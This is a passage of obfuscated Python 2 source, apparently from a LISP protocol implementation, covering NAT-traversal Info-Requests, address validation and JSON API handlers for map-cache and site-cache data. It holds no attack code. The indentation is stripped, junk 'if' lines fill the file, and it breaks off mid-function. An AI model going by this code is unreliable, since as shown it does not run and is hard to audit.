if 40 - 40: I1IiiI . o0oOOo0O0Ooo - Oo0Ooo
if 44 - 44: Ii1I % OoO0O00 * oO0o * OoO0O00
if 7 - 7: I1Ii111 % i1IIi . I11i . O0 / i1IIi
if 56 - 56: Oo0Ooo
if 21 - 21: i11iIiiIii * o0oOOo0O0Ooo + Oo0Ooo
if 20 - 20: IiII / OoooooooOO / O0 / I1Ii111 * ooOoO0o
if 45 - 45: ooOoO0o / Oo0Ooo % o0oOOo0O0Ooo . ooOoO0o
if 19 - 19: o0oOOo0O0Ooo % I11i . I1ii11iIi11i
if 70 - 70: Oo0Ooo - I11i / I1ii11iIi11i % OoO0O00 % II111iiii
if 72 - 72: i11iIiiIii * I11i
if 69 - 69: I1Ii111 . Ii1I * I1ii11iIi11i % I11i - o0oOOo0O0Ooo
if 30 - 30: ooOoO0o / Oo0Ooo * iII111i % OoooooooOO / I1ii11iIi11i
def lisp_build_info_requests ( lisp_sockets , dest , port ) :
if ( lisp_nat_traversal == False ) : return
if 64 - 64: OoooooooOO
if 41 - 41: Ii1I . I11i / oO0o * OoooooooOO
if 98 - 98: I1ii11iIi11i - O0 + i11iIiiIii
if 71 - 71: O0 - OoooooooOO
if 82 - 82: i11iIiiIii * II111iiii % IiII
if 80 - 80: Ii1I . i11iIiiIii % oO0o * o0oOOo0O0Ooo
O0o0OoOOOOo = [ ]
o0Oo0000o00 = [ ]
if ( dest == None ) :
for oOO00O0oooo00 in lisp_map_resolvers_list . values ( ) :
o0Oo0000o00 . append ( oOO00O0oooo00 . map_resolver )
if 95 - 95: iII111i + OoooooooOO + O0 . OoOoOO00 + I1ii11iIi11i
O0o0OoOOOOo = o0Oo0000o00
if ( O0o0OoOOOOo == [ ] ) :
for ii1i in lisp_map_servers_list . values ( ) :
O0o0OoOOOOo . append ( ii1i . map_server )
if 79 - 79: OoooooooOO / iII111i / IiII . OoooooooOO
if 92 - 92: I11i + O0 % II111iiii - I1ii11iIi11i + OoooooooOO . iIii1I11I1II1
if ( O0o0OoOOOOo == [ ] ) : return
else :
O0o0OoOOOOo . append ( dest )
if 85 - 85: O0 - ooOoO0o
if 35 - 35: o0oOOo0O0Ooo - I1IiiI
if 47 - 47: i11iIiiIii * iII111i . OoOoOO00 * I1Ii111 % i11iIiiIii + Ii1I
if 65 - 65: Ii1I % i11iIiiIii
if 98 - 98: iII111i * o0oOOo0O0Ooo % Oo0Ooo
IIiiiI1IIi1iI1i = { }
for Oooo00oo in lisp_db_list :
for o0oO0O00 in Oooo00oo . rloc_set :
lisp_update_local_rloc ( o0oO0O00 )
if ( o0oO0O00 . rloc . is_null ( ) ) : continue
if ( o0oO0O00 . interface == None ) : continue
if 7 - 7: oO0o * OoooooooOO % o0oOOo0O0Ooo . I1Ii111 + O0
o0o00O0oOooO0 = o0oO0O00 . rloc . print_address_no_iid ( )
if ( o0o00O0oOooO0 in IIiiiI1IIi1iI1i ) : continue
IIiiiI1IIi1iI1i [ o0o00O0oOooO0 ] = o0oO0O00 . interface
if 14 - 14: I11i * II111iiii % o0oOOo0O0Ooo / iII111i . OoooooooOO % iII111i
if 88 - 88: iII111i
if ( IIiiiI1IIi1iI1i == { } ) :
lprint ( 'Suppress Info-Request, no "interface = <device>" RLOC ' + "found in any database-mappings" )
if 94 - 94: OoooooooOO
return
if 32 - 32: I1ii11iIi11i
if 8 - 8: I11i * i11iIiiIii - ooOoO0o
if 47 - 47: ooOoO0o . I1IiiI / i11iIiiIii * iII111i * I1IiiI
if 8 - 8: oO0o % oO0o . iII111i / i1IIi % IiII
if 71 - 71: OoOoOO00 + oO0o % O0 + Oo0Ooo
if 62 - 62: i1IIi . Ii1I * i1IIi * O0 . I1IiiI % o0oOOo0O0Ooo
for o0o00O0oOooO0 in IIiiiI1IIi1iI1i :
II1i = IIiiiI1IIi1iI1i [ o0o00O0oOooO0 ]
oO0OO = red ( o0o00O0oOooO0 , False )
lprint ( "Build Info-Request for private address {} ({})" . format ( oO0OO ,
II1i ) )
OoO0o0OOOO = II1i if len ( IIiiiI1IIi1iI1i ) > 1 else None
for dest in O0o0OoOOOOo :
lisp_send_info_request ( lisp_sockets , dest , port , OoO0o0OOOO )
if 16 - 16: I11i . Ii1I - ooOoO0o . OOooOOo % O0 / oO0o
if 42 - 42: II111iiii . iII111i
if 67 - 67: i1IIi - i11iIiiIii / ooOoO0o * oO0o
if 64 - 64: oO0o / IiII
if 86 - 86: I11i
if 36 - 36: o0oOOo0O0Ooo / OoO0O00
if ( o0Oo0000o00 != [ ] ) :
for oOO00O0oooo00 in lisp_map_resolvers_list . values ( ) :
oOO00O0oooo00 . resolve_dns_name ( )
if 6 - 6: I11i % I1IiiI + iII111i * OoooooooOO . O0
if 87 - 87: ooOoO0o / Ii1I % O0 . OoO0O00
return
if 55 - 55: i1IIi . o0oOOo0O0Ooo % OoooooooOO + II111iiii . OoOoOO00
if 32 - 32: IiII * I1Ii111 * Oo0Ooo . i1IIi * OoooooooOO
if 12 - 12: I1IiiI . OOooOOo % Oo0Ooo
if 86 - 86: i11iIiiIii
if 57 - 57: iII111i - OoooooooOO - ooOoO0o % II111iiii
if 62 - 62: i11iIiiIii . Oo0Ooo / Oo0Ooo . IiII . OoooooooOO
if 86 - 86: I1ii11iIi11i * OoOoOO00 + iII111i
if 79 - 79: I11i - II111iiii
def lisp_valid_address_format ( kw , value ) :
if ( kw != "address" ) : return ( True )
if 27 - 27: I1IiiI + o0oOOo0O0Ooo * oO0o % I1IiiI
if 66 - 66: OoO0O00 + IiII . o0oOOo0O0Ooo . IiII
if 88 - 88: oO0o + oO0o % OoO0O00 . OoooooooOO - OoooooooOO . Oo0Ooo
if 44 - 44: I1IiiI * IiII . OoooooooOO
if 62 - 62: I11i - Ii1I / i11iIiiIii * I1IiiI + ooOoO0o + o0oOOo0O0Ooo
if ( value [ 0 ] == "'" and value [ - 1 ] == "'" ) : return ( True )
if 10 - 10: i1IIi + o0oOOo0O0Ooo
if 47 - 47: OOooOOo * IiII % I1Ii111 . OoOoOO00 - OoooooooOO / OoooooooOO
if 79 - 79: I11i % i11iIiiIii % I1IiiI . OoooooooOO * oO0o . Ii1I
if 14 - 14: iIii1I11I1II1 / I11i - o0oOOo0O0Ooo / IiII / o0oOOo0O0Ooo . OoO0O00
if ( value . find ( "." ) != - 1 ) :
o0o00O0oOooO0 = value . split ( "." )
if ( len ( o0o00O0oOooO0 ) != 4 ) : return ( False )
if 2 - 2: I11i
for iiOoOo in o0o00O0oOooO0 :
if ( iiOoOo . isdigit ( ) == False ) : return ( False )
if ( int ( iiOoOo ) > 255 ) : return ( False )
if 81 - 81: Ii1I . i1IIi % iII111i . OoO0O00 % IiII
return ( True )
if 42 - 42: iII111i / Oo0Ooo
if 14 - 14: O0 . Oo0Ooo
if 8 - 8: i11iIiiIii
if 80 - 80: I1ii11iIi11i + Ii1I
if 16 - 16: i11iIiiIii * Oo0Ooo
if ( value . find ( "-" ) != - 1 ) :
o0o00O0oOooO0 = value . split ( "-" )
for iIi1I1 in [ "N" , "S" , "W" , "E" ] :
if ( iIi1I1 in o0o00O0oOooO0 ) :
if ( len ( o0o00O0oOooO0 ) < 8 ) : return ( False )
return ( True )
if 76 - 76: iII111i . oO0o - i1IIi
if 94 - 94: O0 % iII111i
if 90 - 90: IiII
if 1 - 1: I1ii11iIi11i % OoOoOO00 . I1ii11iIi11i . OoooooooOO % oO0o + Ii1I
if 46 - 46: I1IiiI + OoO0O00 - Oo0Ooo
if 13 - 13: OoOoOO00
if 72 - 72: II111iiii * iII111i . II111iiii + iII111i * IiII
if ( value . find ( "-" ) != - 1 ) :
o0o00O0oOooO0 = value . split ( "-" )
if ( len ( o0o00O0oOooO0 ) != 3 ) : return ( False )
if 90 - 90: oO0o * I1Ii111 / O0
for IIiii1IiiIiii in o0o00O0oOooO0 :
try : int ( IIiii1IiiIiii , 16 )
except : return ( False )
if 81 - 81: I11i
return ( True )
if 31 - 31: OoooooooOO - OoO0O00 . iIii1I11I1II1 % I1IiiI
if 98 - 98: I1IiiI + Ii1I
if 7 - 7: o0oOOo0O0Ooo . OoooooooOO
if 32 - 32: I1ii11iIi11i
if 46 - 46: Ii1I . i11iIiiIii / I1Ii111 - I1ii11iIi11i
if ( value . find ( ":" ) != - 1 ) :
o0o00O0oOooO0 = value . split ( ":" )
if ( len ( o0o00O0oOooO0 ) < 2 ) : return ( False )
if 13 - 13: IiII % I1Ii111
Ii11iI1Ii1I1 = False
I1I1 = 0
for IIiii1IiiIiii in o0o00O0oOooO0 :
I1I1 += 1
if ( IIiii1IiiIiii == "" ) :
if ( Ii11iI1Ii1I1 ) :
if ( len ( o0o00O0oOooO0 ) == I1I1 ) : break
if ( I1I1 > 2 ) : return ( False )
if 70 - 70: iIii1I11I1II1 . i1IIi / OOooOOo . oO0o / i11iIiiIii + II111iiii
Ii11iI1Ii1I1 = True
continue
if 89 - 89: I11i * O0 * Oo0Ooo % i1IIi
try : int ( IIiii1IiiIiii , 16 )
except : return ( False )
if 41 - 41: OOooOOo + ooOoO0o - OoOoOO00 . iIii1I11I1II1
return ( True )
if 73 - 73: I1ii11iIi11i / OoooooooOO + II111iiii * Oo0Ooo * I1ii11iIi11i / OoO0O00
if 49 - 49: OOooOOo % Oo0Ooo % OoOoOO00 - OoooooooOO % iII111i - O0
if 62 - 62: iIii1I11I1II1
if 14 - 14: I1Ii111
if 95 - 95: II111iiii / o0oOOo0O0Ooo * OOooOOo
if ( value [ 0 ] == "+" ) :
o0o00O0oOooO0 = value [ 1 : : ]
for ooo0O in o0o00O0oOooO0 :
if ( ooo0O . isdigit ( ) == False ) : return ( False )
if 1 - 1: I1Ii111
return ( True )
if 57 - 57: oO0o * i1IIi + iIii1I11I1II1
return ( False )
if 13 - 13: I1Ii111 * iII111i
if 46 - 46: Oo0Ooo
if 92 - 92: I1Ii111 * OoO0O00 . ooOoO0o
if 6 - 6: o0oOOo0O0Ooo + OOooOOo
if 75 - 75: Ii1I - II111iiii % I1IiiI . I1Ii111
if 74 - 74: II111iiii - o0oOOo0O0Ooo + ooOoO0o - iIii1I11I1II1 / OoO0O00
if 89 - 89: I1Ii111 + ooOoO0o + I1Ii111
if 35 - 35: O0 * OoOoOO00
if 54 - 54: O0 / Oo0Ooo
if 54 - 54: OoO0O00
if 38 - 38: II111iiii + o0oOOo0O0Ooo * I11i + I1Ii111 - II111iiii . OOooOOo
if 38 - 38: I1ii11iIi11i % OOooOOo + iII111i / Oo0Ooo / IiII / oO0o
def lisp_process_api ( process , lisp_socket , data_structure ) :
iiiIi1IIiIiI11I , I1I1i = data_structure . split ( "%" )
if 16 - 16: oO0o
lprint ( "Process API request '{}', parameters: '{}'" . format ( iiiIi1IIiIiI11I ,
I1I1i ) )
if 32 - 32: OoooooooOO
oOO00o0 = [ ]
if ( iiiIi1IIiIiI11I == "map-cache" ) :
if ( I1I1i == "" ) :
oOO00o0 = lisp_map_cache . walk_cache ( lisp_process_api_map_cache , oOO00o0 )
else :
oOO00o0 = lisp_process_api_map_cache_entry ( json . loads ( I1I1i ) )
if 77 - 77: Oo0Ooo . i1IIi - I11i
if 98 - 98: O0
if ( iiiIi1IIiIiI11I == "site-cache" ) :
if ( I1I1i == "" ) :
oOO00o0 = lisp_sites_by_eid . walk_cache ( lisp_process_api_site_cache ,
oOO00o0 )
else :
oOO00o0 = lisp_process_api_site_cache_entry ( json . loads ( I1I1i ) )
if 87 - 87: OoO0O00 % I1Ii111 - OOooOOo - II111iiii + iII111i
if 54 - 54: i1IIi % iII111i
if ( iiiIi1IIiIiI11I == "site-cache-summary" ) :
oOO00o0 = lisp_process_api_site_cache_summary ( lisp_sites_by_eid )
if 16 - 16: II111iiii - Oo0Ooo
if ( iiiIi1IIiIiI11I == "map-server" ) :
I1I1i = { } if ( I1I1i == "" ) else json . loads ( I1I1i )
oOO00o0 = lisp_process_api_ms_or_mr ( True , I1I1i )
if 44 - 44: OOooOOo / Oo0Ooo - I1ii11iIi11i + I11i . oO0o
if ( iiiIi1IIiIiI11I == "map-resolver" ) :
I1I1i = { } if ( I1I1i == "" ) else json . loads ( I1I1i )
oOO00o0 = lisp_process_api_ms_or_mr ( False , I1I1i )
if 85 - 85: iIii1I11I1II1 / Ii1I
if ( iiiIi1IIiIiI11I == "database-mapping" ) :
oOO00o0 = lisp_process_api_database_mapping ( )
if 43 - 43: I1IiiI % I1Ii111 - oO0o . II111iiii / iIii1I11I1II1
if 97 - 97: I1Ii111 + I1ii11iIi11i
if 21 - 21: O0 + o0oOOo0O0Ooo * OoooooooOO % IiII % I1ii11iIi11i
if 80 - 80: I11i
if 28 - 28: OoOoOO00 * OoooooooOO * i11iIiiIii
oOO00o0 = json . dumps ( oOO00o0 )
oOOO0oo0 = lisp_api_ipc ( process , oOO00o0 )
lisp_ipc ( oOOO0oo0 , lisp_socket , "lisp-core" )
return
if 88 - 88: ooOoO0o + ooOoO0o / I1Ii111
if 69 - 69: O0 * o0oOOo0O0Ooo + i1IIi * ooOoO0o . o0oOOo0O0Ooo
if 46 - 46: Oo0Ooo / Oo0Ooo * IiII
if 65 - 65: iIii1I11I1II1 * o0oOOo0O0Ooo - iII111i % II111iiii - I1ii11iIi11i
if 65 - 65: I11i
if 92 - 92: iII111i . IiII + i1IIi % i1IIi
if 11 - 11: I1ii11iIi11i + iIii1I11I1II1 - I1Ii111 * iIii1I11I1II1 * IiII + oO0o
def lisp_process_api_map_cache ( mc , data ) :
if 6 - 6: I1Ii111 * OOooOOo + i1IIi - Ii1I / oO0o
if 81 - 81: I1Ii111 % oO0o * i1IIi * OoooooooOO / Oo0Ooo
if 70 - 70: I1IiiI
if 35 - 35: i11iIiiIii
if ( mc . group . is_null ( ) ) : return ( lisp_gather_map_cache_data ( mc , data ) )
if 59 - 59: ooOoO0o . iII111i - II111iiii
if ( mc . source_cache == None ) : return ( [ True , data ] )
if 30 - 30: o0oOOo0O0Ooo % iII111i - i11iIiiIii
if 25 - 25: i11iIiiIii + OoOoOO00 + oO0o / Ii1I * Oo0Ooo + Oo0Ooo
if 26 - 26: I1IiiI % I1ii11iIi11i + o0oOOo0O0Ooo / I1ii11iIi11i - I1IiiI
if 55 - 55: OoooooooOO
if 2 - 2: Oo0Ooo + I11i / OOooOOo + OOooOOo
data = mc . source_cache . walk_cache ( lisp_gather_map_cache_data , data )
return ( [ True , data ] )
if 62 - 62: OOooOOo . iIii1I11I1II1 + I1IiiI / OOooOOo
if 90 - 90: OOooOOo
if 29 - 29: OoOoOO00 - I1IiiI / oO0o + Oo0Ooo + I1Ii111 + O0
if 65 - 65: oO0o
if 38 - 38: iIii1I11I1II1 / I1Ii111 + ooOoO0o . II111iiii - iIii1I11I1II1
if 13 - 13: Ii1I
if 34 - 34: I1IiiI / iIii1I11I1II1
def lisp_gather_map_cache_data ( mc , data ) :
i1ii1i1Ii11 = { }
i1ii1i1Ii11 [ "instance-id" ] = str ( mc . eid . instance_id )
i1ii1i1Ii11 [ "eid-prefix" ] = mc . eid . print_prefix_no_iid ( )
if ( mc . group . is_null ( ) == False ) :
i1ii1i1Ii11 [ "group-prefix" ] = mc . group . print_prefix_no_iid ( )
if 35 - 35: oO0o / oO0o
i1ii1i1Ii11 [ "uptime" ] = lisp_print_elapsed ( mc . uptime )
i1ii1i1Ii11 [ "expires" ] = lisp_print_elapsed ( mc . uptime )
i1ii1i1Ii11 [ "action" ] = lisp_map_reply_action_string [ mc . action ]
i1ii1i1Ii11 [ "ttl" ] = "--" if mc . map_cache_ttl == None else str ( mc . map_cache_ttl / 60 )
if 86 - 86: o0oOOo0O0Ooo . Oo0Ooo - Ii1I / i11iIiiIii
if 63 - 63: oO0o - O0 + I1ii11iIi11i + Ii1I / i1IIi
if 77 - 77: O0
if 49 - 49: o0oOOo0O0Ooo / i11iIiiIii
if 36 - 36: II111iiii
OoO0oOOooOO = [ ]
for I1II in mc . rloc_set :
I1I111iIiI = lisp_fill_rloc_in_json ( I1II )
if 78 - 78: OoO0O00 + iIii1I11I1II1 * i1IIi
if 7 - 7: i11iIiiIii
if 49 - 49: I1IiiI - oO0o % OOooOOo / O0 / II111iiii
if 41 - 41: IiII % II111iiii
if 99 - 99: IiII - O0
if ( I1II . rloc . is_multicast_address ( ) ) :
I1I111iIiI [ "multicast-rloc-set" ] = [ ]
for I111i11 in I1II . multicast_rloc_probe_list . values ( ) :
oOO00O0oooo00 = lisp_fill_rloc_in_json ( I111i11 )
I1I111iIiI [ "multicast-rloc-set" ] . append ( oOO00O0oooo00 )
if 59 - 59: iII111i % O0 + OOooOOo * ooOoO0o
if 27 - 27: I1Ii111 % i11iIiiIii * I1IiiI
if 19 - 19: OoOoOO00 / o0oOOo0O0Ooo - iII111i / OoO0O00
OoO0oOOooOO . append ( I1I111iIiI )
if 12 - 12: I1ii11iIi11i - I11i * O0 % I1IiiI + O0 - II111iiii
i1ii1i1Ii11 [ "rloc-set" ] = OoO0oOOooOO
if 13 - 13: iII111i / OOooOOo * i11iIiiIii / oO0o / OoooooooOO
data . append ( i1ii1i1Ii11 )
return ( [ True , data ] )
if 89 - 89: Ii1I * Oo0Ooo / I1Ii111 * I1ii11iIi11i + O0 * Oo0Ooo
if 74 - 74: I11i . I11i
if 74 - 74: OoOoOO00 * ooOoO0o * I1Ii111
if 56 - 56: iIii1I11I1II1 * OoO0O00 - oO0o * Ii1I
if 62 - 62: i1IIi + I11i / OOooOOo - OoooooooOO % i1IIi . I1IiiI
if 13 - 13: O0 * iII111i
if 26 - 26: i1IIi - I1Ii111 - ooOoO0o
if 73 - 73: o0oOOo0O0Ooo . OoooooooOO
def lisp_fill_rloc_in_json ( rloc ) :
I1I111iIiI = { }
if ( rloc . rloc_exists ( ) ) :
I1I111iIiI [ "address" ] = rloc . rloc . print_address_no_iid ( )
if 96 - 96: i1IIi - OOooOOo / I11i % OoOoOO00 - i11iIiiIii % II111iiii
if 47 - 47: I1Ii111 * iII111i
if ( rloc . translated_port != 0 ) :
I1I111iIiI [ "encap-port" ] = str ( rloc . translated_port )
if 90 - 90: i1IIi * Ii1I . OoO0O00 % I11i * ooOoO0o . OOooOOo
I1I111iIiI [ "state" ] = rloc . print_state ( )
if ( rloc . geo ) : I1I111iIiI [ "geo" ] = rloc . geo . print_geo ( )
if ( rloc . elp ) : I1I111iIiI [ "elp" ] = rloc . elp . print_elp ( False )
if ( rloc . rle ) : I1I111iIiI [ "rle" ] = rloc . rle . print_rle ( False , False )
if ( rloc . json ) : I1I111iIiI [ "json" ] = rloc . json . print_json ( False )
if ( rloc . rloc_name ) : I1I111iIiI [ "rloc-name" ] = rloc . rloc_name
ii = rloc . stats . get_stats ( False , False )
if ( ii ) : I1I111iIiI [ "stats" ] = ii
I1I111iIiI [ "uptime" ] = lisp_print_elapsed ( rloc . uptime )
I1I111iIiI [ "upriority" ] = str ( rloc . priority )
I1I111iIiI [ "uweight" ] = str ( rloc . weight )
I1I111iIiI [ "mpriority" ] = str ( rloc . mpriority )
I1I111iIiI [ "mweight" ] = str ( rloc . mweight )
Oo0I1Iii = rloc . last_rloc_probe_reply
if ( Oo0I1Iii ) :
I1I111iIiI [ "last-rloc-probe-reply" ] = lisp_print_elapsed ( Oo0I1Iii )
I1I111iIiI [ "rloc-probe-rtt" ] = str ( rloc . rloc_probe_rtt )
if 52 - 52: I1Ii111
I1I111iIiI [ "rloc-hop-count" ] = rloc . rloc_probe_hops
I1I111iIiI [ "recent-rloc-hop-counts" ] = rloc . recent_rloc_probe_hops
if 82 - 82: iII111i + II111iiii
I1I111iIiI [ "rloc-probe-latency" ] = rloc . rloc_probe_latency
I1I111iIiI [ "recent-rloc-probe-latencies" ] = rloc . recent_rloc_probe_latencies
if 29 - 29: O0 % Ii1I * ooOoO0o % O0
o000O0ooo = [ ]
for I11iiI111iIi1I in rloc . recent_rloc_probe_rtts : o000O0ooo . append ( str ( I11iiI111iIi1I ) )
I1I111iIiI [ "recent-rloc-probe-rtts" ] = o000O0ooo
return ( I1I111iIiI )
if 34 - 34: iII111i - i1IIi / I11i . Ii1I - I11i / iII111i
if 25 - 25: ooOoO0o + OoO0O00 % iII111i % I1ii11iIi11i . I1ii11iIi11i % OoO0O00
if 90 - 90: OOooOOo
if 91 - 91: OoooooooOO % I11i - OOooOOo
if 88 - 88: Ii1I / i11iIiiIii
if 89 - 89: ooOoO0o
if 83 - 83: I11i . I11i * OOooOOo - OOooOOo
def lisp_process_api_map_cache_entry ( parms ) :
IiIIi11i111 = parms [ "instance-id" ]
IiIIi11i111 = 0 if ( IiIIi11i111 == "" ) else int ( IiIIi11i111 )
if 46 - 46: iIii1I11I1II1 . I1Ii111 % I1IiiI
if 22 - 22: i1IIi * I11i + II111iiii + II111iiii
if 20 - 20: I11i
if 37 - 37: I1Ii111
iiI1I1IIi = lisp_address ( LISP_AFI_NONE , "" , 0 , IiIIi11i111 )
iiI1I1IIi . store_prefix ( parms [ "eid-prefix" ] )
Ii1II1I11i1I = iiI1I1IIi
iI1Iii1i1 = iiI1I1IIi
if 19 - 19: I1ii11iIi11i / OOooOOo . I1IiiI / ooOoO0o + OoO0O00 + i11iIiiIii
if 80 - 80: OoO0O00 . O0 / Ii1I % I1Ii111 / iII111i * I1IiiI
if 41 - 41: O0 / OoooooooOO - i1IIi
if 6 - 6: i1IIi - I1ii11iIi11i % I1Ii111 - II111iiii / ooOoO0o / i11iIiiIii
if 32 - 32: oO0o / IiII - I11i . ooOoO0o
OOo0oOOO0 = lisp_address ( LISP_AFI_NONE , "" , 0 , IiIIi11i111 )
if ( parms . has_key ( "group-prefix" ) ) :
OOo0oOOO0 . store_prefix ( parms [ "group-prefix" ] )
Ii1II1I11i1I = OOo0oOOO0
if 69 - 69: i11iIiiIii * i11iIiiIii
if 100 - 100: I1ii11iIi11i * I1ii11iIi11i + i1IIi
oOO00o0 = [ ]
o0oO0o00 = lisp_map_cache_lookup ( iI1Iii1i1 , Ii1II1I11i1I )
if ( o0oO0o00 ) : OO0OO0oO0o000 , oOO00o0 = lisp_process_api_map_cache ( o0oO0o00 , oOO00o0 )
return ( oOO00o0 )
if 96 - 96: I1Ii111 / I1IiiI + ooOoO0o
if 16 - 16: I1ii11iIi11i % o0oOOo0O0Ooo % OOooOOo % OoOoOO00 + ooOoO0o % I1ii11iIi11i
if 85 - 85: oO0o * OoooooooOO * iIii1I11I1II1 + iII111i
if 67 - 67: Ii1I / i11iIiiIii % OoOoOO00 % O0 / OoOoOO00
if 54 - 54: I11i . OoOoOO00 / II111iiii . i1IIi + OOooOOo % II111iiii
if 82 - 82: i11iIiiIii . OoooooooOO % OoOoOO00 * O0 - I1Ii111
if 78 - 78: OoOoOO00 % Ii1I % OOooOOo % Oo0Ooo % I11i . Ii1I
if 73 - 73: OoooooooOO / i1IIi . iIii1I11I1II1
if 89 - 89: I1Ii111
if 29 - 29: I11i * ooOoO0o - OoooooooOO
if 92 - 92: O0 % i1IIi / OOooOOo - oO0o
def lisp_process_api_site_cache_summary ( site_cache ) :
ooo000O0O = { "site" : "" , "registrations" : [ ] }
i1ii1i1Ii11 = { "eid-prefix" : "" , "count" : 0 , "registered-count" : 0 }
if 83 - 83: o0oOOo0O0Ooo . OoO0O00 % iIii1I11I1II1 % OoOoOO00 - i11iIiiIii
OOoo0oOoO = { }
for iiIi in site_cache . cache_sorted :
for iIiIi1I in site_cache . cache [ iiIi ] . entries . values ( ) :
if ( iIiIi1I . accept_more_specifics == False ) : continue
if ( OOoo0oOoO . has_key ( iIiIi1I . site . site_name ) == False ) :
OOoo0oOoO [ iIiIi1I . site . site_name ] = [ ]
if 73 - 73: OoooooooOO
iIIi1iI1I1IIi = copy . deepcopy ( i1ii1i1Ii11 )
iIIi1iI1I1IIi [ "eid-prefix" ] = iIiIi1I . eid . print_prefix ( )
iIIi1iI1I1IIi [ "count" ] = len ( iIiIi1I . more_specific_registrations )
for iiiI1Ii1IiiIi1 in iIiIi1I . more_specific_registrations :
if ( iiiI1Ii1IiiIi1 . registered ) : iIIi1iI1I1IIi [ "registered-count" ] += 1
if 37 - 37: iII111i - ooOoO0o % O0 + I1Ii111
OOoo0oOoO [ iIiIi1I . site . site_name ] . append ( iIIi1iI1I1IIi )
if 15 - 15: I1Ii111 * iIii1I11I1II1 - iIii1I11I1II1 - O0
if 41 - 41: O0 - i11iIiiIii - I1Ii111 + i1IIi - iIii1I11I1II1 . Oo0Ooo
if 38 - 38: Oo0Ooo - I1ii11iIi11i
oOO00o0 = [ ]
for i11I11iiiI1 in OOoo0oOoO :
OO0o0OO0 = copy . deepcopy ( ooo000O0O )
OO0o0OO0 [ "site" ] = i11I11iiiI1
OO0o0OO0 [ "registrations" ] = OOoo0oOoO [ i11I11iiiI1 ]
oOO00o0 . append ( OO0o0OO0 )
if 19 - 19: Ii1I * OoO0O00 / OoO0O00 . II111iiii % iIii1I11I1II1
return ( oOO00o0 )
if 61 - 61: I1ii11iIi11i * oO0o % iII111i + IiII + i11iIiiIii * I11i
if 3 - 3: Ii1I
if 71 - 71: iIii1I11I1II1 . OOooOOo / I11i / i1IIi
if 69 - 69: i1IIi / iII111i + Ii1I + I11i + IiII
if 86 - 86: Oo0Ooo
if 97 - 97: I1IiiI
if 91 - 91: ooOoO0o / oO0o * OOooOOo . II111iiii - I11i - I11i
def lisp_process_api_site_cache ( se , data ) :
if 5 - 5: O0 + OoooooooOO + i11iIiiIii * Oo0Ooo * OoOoOO00 . oO0o
if 6 - 6: OoO0O00 % Oo0Ooo % I1IiiI % o0oOOo0O0Ooo % O0 % Oo0Ooo
if 94 - 94: I11i . i1IIi / II111iiii + OOooOOo
if 64 - 64: I1IiiI % ooOoO0o
if ( se . group . is_null ( ) ) : return ( lisp_gather_site_cache_data ( se , data ) )
if 72 - 72: O0 * II111iiii % OoO0O00 - I1IiiI * OOooOOo
if ( se . source_cache == None ) : return ( [ True , data ] )
if 80 - 80: OOooOOo * I11i / OOooOOo - oO0o
if 18 - 18: i1IIi - OOooOOo - o0oOOo0O0Ooo - iIii1I11I1II1
if 72 - 72: OoooooooOO % I1IiiI . OoO0O00
if 28 - 28: II111iiii / iIii1I11I1II1 / iII111i - o0oOOo0O0Ooo . I1IiiI / O0
if 16 - 16: ooOoO0o * oO0o . OoooooooOO
data = se . source_cache . walk_cache ( lisp_gather_site_cache_data , data )
return ( [ True , data ] )
if 44 - 44: iIii1I11I1II1 * OOooOOo + OoO0O00 - OoooooooOO
if 13 - 13: Oo0Ooo . I11i . II111iiii
if 6 - 6: OOooOOo . IiII / OoO0O00 * oO0o - I1Ii111 . OoOoOO00
if 85 - 85: i11iIiiIii + OoOoOO00
if 4 - 4: OOooOOo . OoO0O00 * II111iiii + OoO0O00 % Oo0Ooo
if 60 - 60: OOooOOo . Ii1I
if 13 - 13: i1IIi . iII111i / OoOoOO00 . I1Ii111
def lisp_process_api_ms_or_mr ( ms_or_mr , data ) :
ii1i1II11II1i = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
iiIiII = data [ "dns-name" ] if data . has_key ( "dns-name" ) else None
if ( data . has_key ( "address" ) ) :
ii1i1II11II1i . store_address ( data [ "address" ] )
if 65 - 65: oO0o % I1Ii111 % OoO0O00 . iIii1I11I1II1
if 38 - 38: IiII / I11i / IiII * iII111i
Oo00OO0OO = { }
if ( ms_or_mr ) :
for ii1i in lisp_map_servers_list . values ( ) :
if ( iiIiII ) :
if ( iiIiII != ii1i . dns_name ) : continue
else :
if ( ii1i1II11II1i . is_exact_match ( ii1i . map_server ) == False ) : continue
if 30 - 30: oO0o
if 30 - 30: IiII / OoO0O00
Oo00OO0OO [ "dns-name" ] = ii1i . dns_name
Oo00OO0OO [ "address" ] = ii1i . map_server . print_address_no_iid ( )
Oo00OO0OO [ "ms-name" ] = "" if ii1i . ms_name == None else ii1i . ms_name
return ( [ Oo00OO0OO ] )
if 89 - 89: oO0o . OoOoOO00 . IiII / iIii1I11I1II1 . iIii1I11I1II1 / OoOoOO00
else :
for oOO00O0oooo00 in lisp_map_resolvers_list . values ( ) :
if ( iiIiII ) :
if ( iiIiII != oOO00O0oooo00 . dns_name ) : continue
else :
if ( ii1i1II11II1i . is_exact_match ( oOO00O0oooo00 . map_resolver ) == False ) : continue
if 86 - 86: OoooooooOO - iIii1I11I1II1 . OoO0O00 * Ii1I / I1Ii111 + I1Ii111
if 52 - 52: iIii1I11I1II1 % OoO0O00 - IiII % i11iIiiIii - o0oOOo0O0Ooo
Oo00OO0OO [ "dns-name" ] = oOO00O0oooo00 . dns_name
Oo00OO0OO [ "address" ] = oOO00O0oooo00 . map_resolver . print_address_no_iid ( )
Oo00OO0OO [ "mr-name" ] = "" if oOO00O0oooo00 . mr_name == None else oOO00O0oooo00 . mr_name
return ( [ Oo00OO0OO ] )
if 25 - 25: Oo0Ooo - OOooOOo . i1IIi * OoOoOO00 / I11i / o0oOOo0O0Ooo
if 54 - 54: OoOoOO00 / i1IIi + OOooOOo - I1ii11iIi11i - I1IiiI * I1Ii111
return ( [ ] )
if 91 - 91: OoooooooOO * OoooooooOO
if 27 - 27: ooOoO0o / I1IiiI * I1ii11iIi11i . o0oOOo0O0Ooo
if 30 - 30: o0oOOo0O0Ooo / i11iIiiIii
if 33 - 33: OOooOOo % OoooooooOO
if 98 - 98: Ii1I
if 38 - 38: ooOoO0o - iII111i * OOooOOo % I1ii11iIi11i + Oo0Ooo
if 95 - 95: iIii1I11I1II1 / O0 % O0
if 53 - 53: ooOoO0o . ooOoO0o
def lisp_process_api_database_mapping ( ) :
oOO00o0 = [ ]
if 80 - 80: i11iIiiIii % I1Ii111 % I1IiiI / I1IiiI + oO0o + iII111i
for Oooo00oo in lisp_db_list :
i1ii1i1Ii11 = { }
